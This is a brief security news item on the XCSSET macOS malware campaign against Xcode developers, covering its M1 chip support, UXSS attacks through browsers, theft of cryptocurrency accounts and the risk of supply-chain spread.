A Mac malware campaign has been targeting Xcode developers with XCSSET malware retooled to add support for Apple's M1 chips. The malware was first spotted in August last year and now has features to steal confidential information from cryptocurrency apps.

What's new?

In March, Kaspersky researchers uncovered XCSSET samples targeting Apple M1 chips, suggesting that attackers adapted their executables and ported them to run on new Apple Silicon chips.
  • Research by Trend Micro reveals that XCSSET is still active and abusing the development version of the Safari browser to spread JavaScript backdoors on websites via Universal Cross-Site Scripting (UXSS) attacks.
  • The malware hosts Safari update packages in the C2 server and then downloads and installs packages for the user's OS version. It is now updated with malicious packages supporting Safari 14.
  • It exploits the remote debugging mode in other browsers such as Opera, Chrome, Brave, Qihoo 360 Browser, Microsoft Edge, Yandex Browser, and Firefox to perform UXSS attacks.
  • Furthermore, it tries to steal account info from various websites, such as cryptocurrency trading platforms Binance, Envato, NNCall[.]net, 163[.]com, and Huobi with abilities to replace user's cryptocurrency wallet addresses.

Recent attacks on M1 chip


Infected Xcode projects pose a major security risk since the targeted developers who share their work on GitHub can end up spreading the malware to their users. Additionally, it could lead to a supply-chain attack for others who use these repositories as dependencies in their own projects.

Cyware Publisher